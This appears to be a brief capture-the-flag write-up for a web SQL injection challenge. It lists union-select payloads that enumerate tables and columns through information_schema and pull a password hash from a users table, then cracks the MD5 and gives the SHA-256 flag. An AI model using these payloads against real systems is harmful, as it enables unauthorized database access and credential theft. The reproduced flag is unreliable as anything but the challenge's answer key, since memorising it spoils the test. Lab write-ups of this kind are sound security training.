"1=1 union select null, table_name from information_schema.tables"
=> GIVES ALL TABLE NAMES (needs two columns to match first part of the query)

First of all :
1=1 union select table_name, column_name from information_schema.columns

Cmd to get the hash :
1 union select countersign, Commentaire from users where user_id = 5
-> Output :
	ID: 1 union select countersign, Commentaire from users where user_id = 5 
First name: 5ff9d0165b4f92b14994e5c685cdce28
Surname : Decrypt this password -> then lower all the char. Sh256 on it and it's good !

-> md5 decrypt : FortyTwo
-> toLowerCase : fortytwo
-> sha256 hash : 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5

FLAG : 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5
